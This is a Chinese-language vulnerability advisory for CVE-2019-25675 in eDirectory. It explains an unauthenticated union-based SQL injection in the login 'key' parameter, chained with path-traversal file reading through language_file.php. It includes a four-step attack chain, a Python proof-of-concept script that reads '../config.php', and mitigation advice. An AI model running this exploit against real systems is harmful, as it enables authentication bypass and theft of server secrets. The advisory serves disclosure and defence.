CVE-2019-25675 CVSS 8.2 高危

CVE-2019-25675 eDirectory SQL注入漏洞

披露日期: 2026-04-05

来源: [email protected]

漏洞信息

漏洞编号

CVE-2019-25675

漏洞类型

SQL注入

CVSS评分

8.2 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

eDirectory

漏洞概述

eDirectory软件存在严重的安全漏洞，涉及多个SQL注入缺陷。未经身份验证的远程攻击者可以通过操纵登录接口中的参数，利用基于联合的SQL注入技术绕过管理员身份验证机制。成功获取管理员权限后，攻击者可进一步利用系统内`language_file.php`文件的认证后文件泄露漏洞，读取服务器上的任意敏感PHP文件，导致核心数据泄露及系统被完全控制的风险。

技术细节

该漏洞源于eDirectory在处理用户输入时缺乏严格的过滤机制，导致SQL注入漏洞。攻击者首先针对登录端点，利用'key'参数进行基于联合的SQL注入攻击。通过构造特定的SQL载荷，攻击者能够绕过正常的身份验证流程，以管理员身份获得系统访问权限。在成功利用SQL注入提升权限后，攻击者利用已获得的管理员会话，访问存在缺陷的`language_file.php`接口。该接口未对文件路径进行有效验证，允许攻击者通过目录遍历或直接指定文件名的方式，读取服务器上的任意文件，包括数据库配置文件、源代码及其他敏感数据，从而对系统安全造成毁灭性打击。

攻击链分析

STEP 1

步骤1

攻击者向eDirectory的登录端点发送请求，并在'key'参数中注入恶意SQL代码。

STEP 2

步骤2

利用基于联合的SQL注入漏洞绕过身份验证，获取管理员权限的Session。

STEP 3

步骤3

利用获得的管理员权限，访问language_file.php接口。

STEP 4

步骤4

通过修改参数读取服务器上的任意文件，泄露敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

target_url = "http://target.com/login.php"
# Step 1: SQL Injection to bypass authentication
# Exploiting the 'key' parameter with Union Based SQLi
payload = {
    "username": "admin",
    "password": "password", # dummy
    "key": "' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- -"
}
s = requests.Session()
r = s.post(target_url, data=payload)

# Step 2: Exploit authenticated file disclosure
# Reading arbitrary PHP file using language_file.php
file_read_url = "http://target.com/language_file.php"
file_payload = {
    "file": "../config.php" # or any sensitive file
}
file_resp = s.get(file_read_url, params=file_payload)
print(file_resp.text)

影响范围

eDirectory 所有版本

防御指南

临时缓解措施

建议立即部署官方补丁修复此漏洞。在无法立即修复的情况下，应通过网络 ACL 限制对登录接口及 language_file.php 的外部访问，并部署 Web 应用防火墙 (WAF) 拦截针对 'key' 参数的 SQL 注入攻击。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表